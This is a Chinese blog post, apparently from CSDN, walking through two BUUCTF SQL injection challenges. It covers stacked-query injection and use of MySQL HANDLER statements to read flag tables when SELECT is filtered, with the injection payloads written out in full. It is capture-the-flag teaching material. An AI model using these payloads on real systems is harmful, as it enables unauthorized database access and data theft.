Buuctf(handler的使用)[强网杯 2019]随便注 1)+([GYCTF2020]Blacklist 1)

已于 2022-08-26 15:56:16 修改
阅读量363 收藏 1
点赞数
分类专栏: BuuCTF 文章标签: 数据库
于 2022-05-23 22:30:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64444909/article/details/124916666
版权
本文详细介绍了SQL注入的判断方法,包括闭合方式的确定、数据库列数的探测、注入点识别以及利用堆叠注入进行数据库、表和字段的爆破。在面对过滤限制时,通过Handler命令绕过限制获取字段内容。文章展示了两种不同场景下的实战应用,强调了Handler在SQL注入中的重要作用。
摘要由CSDN通过智能技术生成

判断闭合方式

方法一.使用(转义字符)\来判断SQL注入的闭合方式,看\斜杠后面跟着的字符,是什么字符,它的闭合字符就是什么,若是没有,就为数字型。

方法二.首先尝试:

?id=1’
?id=1"
结果一:如果都报错
判断闭合符为:整形闭合。

结果二:如果单引号报错,双引号不报错

继续尝试:
?id=1’ #
结果一:无报错
判断闭合符为:单引号闭合。
结果二:报错
判断闭合符可能为:单引号加括号。

结果三:如果单引号不报错,双引号报错

最后尝试:
?id=1" #
结果一:结果无报错
判断闭合符为:双引号闭合。
结果二:报错
判断闭合符可能为:双引号加括号。
SQL注入原理及如何判断闭合符

[强网杯 2019]随便注 1

一.判断闭合方式

在这里插入图片描述

法一: 输入1\发现\后边跟着是’‘,暂定为’'双引号闭合方式,
error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1\'' at line 1
但是后边’'双引号闭合方式无论输入什么内容都只有一个回显,无法注入,所以需要法二来判断
法二:单引号报错,双引号不报错,尝试1’ #发现不报错,进而判断为单引号闭合

二.判断数据库有几列

order by 到3发现报错,因此数据库只有3列
1' order by 1,2,3 #

在这里插入图片描述

三.判断注入点(显示位,判断显示的信息是第几列的信息)

发现题目使用了preg_match正则匹配函数检测了很多字段,无法判断显示位,过滤了select导致无法进行接下来来爆库爆表等操作,因此我们需要想到用堆叠注入show来进行,在正常情况下堆叠注入的机会很少,因为后果很危险
1' union select 1,2 #

在这里插入图片描述

四.爆库(使用show)

堆叠注入就是用分号(;)来分隔每一条命令。我们在用; 结束一个sql语句后继续构造下一条语句。database应养成良好习惯,使用复数形式,因为不知道有几个库
1';show databases;#

在这里插入图片描述

五.爆表

1';show tables;#

在这里插入图片描述

六.爆字段

我们show了words表没有发现flag,因此show19198109311144514表,发现了flag。使用show 命令查看表中的「字段」,注意表名要用反引号包裹,尤其当表名为数字的时候
1';show columns from `words`;#
1';show columns from `1919810931114514`;#

在这里插入图片描述

六.爆字段内容(select不能使用时,handler就站了出来,handler的是表名不是字段名!!!)

因为show columns form `1919810931114514已经看到flag字段在191这个表里 ,但是show不能进入字段查看字段内容,这里就需要用到handler
1';handler `1919810931114514` open;handler `1919810931114514` read first;#
MySQL“自古以来”都有一个神秘的HANDLER命令。使用此非SQL标准语法,可以降低优化器对于SQL语句的解析与优化开销,从而提升查询性能。HANDLER … OPEN 语句打开⼀个表,后续的 HANDLER … READ FIRST语句可以访问它。

在这里插入图片描述

[GYCTF2020]Blacklist 1

这题和上一道题的步骤一样,只是这题过滤的东西更多

在这里插入图片描述

但是还是没有过滤handler,嘿嘿,一样的操作,直接爆表

1';show tables;#

在这里插入图片描述

发现了flag,接下来爆字段,不要忘记了表名要用反单引号括起来

1';show columns from `FlagHere`;#

在这里插入图片描述

爆字段内容,重要的事情要反复说,不要忘记表名要用反单引号括起来。handler的是表名不是字段名!!!

1';handler `FlagHere` open;handler `FlagHere` read first;#

在这里插入图片描述

小小大空翼
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【微服务】mybatis typehandler使用详解
congge
02-25 5973
mybatis typehandler 使用详解
java handler使用方法_Handler 使用详解
weixin_30569303的博客
02-16 7969
阅读五分钟,每日十点,和您一起终身学习,这里是程序员Android本篇文章主要介绍 Android 开发中的部分知识点,通过阅读本篇文章,您将收获以下内容:Handler 消息处理机制原理Handler 机制处理的4个关键对象Handler常用方法子线程更新UI 异常处理主线程给子线程发送消息的方法子线程给主线程发送消息的方法主、子 线程 互发消息方法子线程方法中调用主线程更新UI的方法Handl...
buuctf-web-[强网杯 2019]随便1
mlws1900的博客
07-29 175
思路是把1919810931114514表改名为words表,把属性名flag改为id,然后用1’or1=1;#显示flag出来。下面的方法我也是看其他wp才知道的,因为之前判断列数时为两列,所以只能查words表,不能查1919810931114514。1919810931114514和words,分别查看内容。把1919810931114514改为words。1919810931114514存在flag。把flag属性变为varchar类型。判断是否有入点(没有题咋做)......
BUUCTF-WEB:[强网杯 2019]随便 1
_Co1a
01-24 983
题目环境:http://de044ac0-9162-4b83-b6a6-8c99ce0efe91.node3.buuoj.cn 打开环境: 尝试入: 解题思路: 1、先尝试用union联合入:第一步、测试入点(一些小tips:利用引号,and 1=1, or 1=1之类的)判断是字符型还是数字型 1' [error] 1'# [不报错,正常回显] 1' and 1=1# ...
BUUCTF-[强网杯 2019]随便1
Monica的博客
09-06 650
目录 题目: 方法: 其他问题: 1、url中#是特殊字符,参数中有#号的时候需要进行url编码。 2、url中空格变成+和空格变成%20问题 题目: 方法: 只有输入1和2才有结果 发现输出是两列,一列是键,一列是值 测试是什么闭合 输入1'发现有个报错 我们复制near后面的代码,通过一个字符一个字符的删除,发现是: 单引号 单引号 1 单引号 单引号 单引号 所以这不是双引号闭合,而是一个单引号闭合。 测试输出有几列 pa...
buuctf [强网杯 2019]随便 1
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql入题。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
BUUCTF】[强网杯 2019]随便 1
qq_45972928的博客
05-06 4083
这是一个典型的sql入题目 知识点: 1、入点检测 2、万能匹配 3、暴力获得数据表和其属性 4、sql语句的掌握(order by; union select; rename table; alter table…等等) 1、进入网站 2、看到一个输入框一个提交框,尝试进行数据输入了解大致情况 经过尝试我们发现,只有输入1,2时有显示,输入0或者其他时没有显示 3、测试是否存在入 and 1=1和and 1=2没有变化 在参数后面加单引号,发现错误,可以尝试进行入 4、尝试0‘ or
BUUCTF系列 // [强网杯2019] 随便
qq_45805420的博客
09-23 601
前言 本题知识点:SQL堆叠入 WP 打开题目,很明显的提示我们应该是SQL入了 So,先按照一般的流程,尝试基本的探测姿势 1. 探测有无入 1' 报错 1'--+ 报错 1'# 正常有回显 1' and 1=1# 正常有回显 1' and 1=2# 正常无回显 可知存在入,且 --+ 释被过滤,# 释可用 2. 尝试获取列数 1' order by 1# 正常有回显 1' order by 2# 正常有回显 1' order by 3# 报错 用 order by
BUUCTF[强网杯2019]随便
楼阁de猫的博客
09-23 521
[强网杯2019]随便 知识点:堆叠入 首先先输入一个1’,发现报错,再输入1’#,有回显,再输入1’ order by 2#,1’order by 3#,当输入3的时候发现无回显,说明入点是2,但是当我们输入1’ union select 1,2#时,发现过滤了很多关键字,这时我们就要考虑堆叠入 我们输入1’; 发现下面出现了一条横线 那应该是堆叠入了,(什么是堆叠入呢:在SQL中,分号是用来表示一条sql语句的结束。如果在 ; 结束一个sql语句后继续构造下一条语句,效果就是分别执行两
buuctf-web-[强网杯 2019]随便-wp
居上
06-22 1374
[强网杯 2019]随便 源码 (这题本身没有源码,源码是我从网上下载的便于学习) <html> <head> <meta charset="UTF-8"> <title>easy_sql</title> </head> <body> <h1>取材于某次真实环境渗透,只说一句话:开发和安全缺一不可</h1> <!-- sqlmap是没有灵魂的 --> <form
Fragment与Activity使用Handler进行交互
06-27
1. **创建Handler实例**:在Activity中创建一个Handler实例,并重写handleMessage()方法。这个方法会在主线程中执行,因此适合用来更新UI。例如: ```java public class MainActivity extends AppCompatActivity { ...
Android Handler的基本使用
热门推荐
奋斗的菜鸟ing
05-27 1万+
转载请明出处:http://blog.csdn.net/vnanyesheshou/article/details/71106622 本文已授权微信公众号 fanfan程序媛 独家发布 扫一扫文章底部的二维码或在微信搜索 fanfan程序媛 即可关 最近看了一篇关于Handler的博客,感觉写的很不错,涉及了Handler的基本使用方法,及Handler、Looper、Messa
BUUCTF】[强网杯 2019]随便1
aoao331198的博客
03-07 389
题目很明显是一道SQL入题目 1' 1' #
BUUCTF闯关日记04--[强网杯 2019]随便1
qq_64201116的博客
05-12 314
进入页面 发现有一个提交,按一下,可以意到右上角出现了url新的传参?inject=1同时意到,多了一些数组 然后就可以尝试闭合符号,一般都是有单引号或者双引号的,逐个尝试 这个是双引号的回显 这个是单引号的回显 单引号报错了,说明数据库是单引号闭合的.然后就是最基础的准备看是否有sql入,有几个字段,有没有显错入 第一步:1' and 1=1--+ //判断and是否过滤 第二步:1' and 1=2--+ //判断是否存在sql入 第三步:1' o...
BUUCTF_[强网杯 2019]随便
qq_45628145的博客
04-25 594
BUUCTF_[强网杯 2019]随便 进入题目环境 进去之后输入框就有一个1,提交。 这里可以看到查询出了1和hahahah。 判断有没有入点 输入1’,报错了。 输入1’ and 1=1 #,查询结果和1一样。 输入1’ and 1=2 #,无回显,因此,判断这里存在入点。 输入1’ or 1=1#,得到了这个表里面的所有内容。 开始入 可以看到上面查询结果有1和hahah...
BUUCTF [强网杯 2019]随便1(另一种方法)
weixin_53955759的博客
06-21 379
打开环境,先判断一下是单引号还是双引号闭合
BUUCTF强网杯 2019随便1 write up
GZWZ_的博客
04-06 4853
回显flag有好几种方法,但我只会一种┭┮﹏┭┮,如果有大佬会其他的,可不可以call我呢
BUUCTF [强网杯 2019] 随便
Senimo
03-23 1633
BUUCTF [强网杯 2019] 随便 打开环境: 先输入1查询回显内容: 输入1'测试SQL语句闭合类型: 判断出原SQL闭合方式为:inject='1',查询字段数: 1' union select 11,22 # 产生回显: 屏蔽掉了部分关键字,尝试各种入姿势,直到使用堆叠入: 1';show databases;# 得到了各数据库的名字,再查看表名: 1';show ...
BUUCTF [强网杯 2019]随便
qq_42158602的博客
01-09 1115
打开题目看见一个输入框 输入’报错 应该是有sql入了 使用 1’ # 正确显示 直接上 order by 1' order by 3 # 测试1,2正常,3报错 此时天真的我以为我已经离成功不远了~~ 启动联合查询 -1' union select 1,2 # 提交 继续 ...
Android卷1:攻克常见类难点,Looper&Handler详解
在《深入理解Android卷1》第五章中,作者深入剖析了Android系统中常见的类及其工作原理,以便帮助开发者更好地理解和使用这些核心组件。本章主要关以下几个关键部分: 1. **RefBase类**:作为Android对象的基石,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值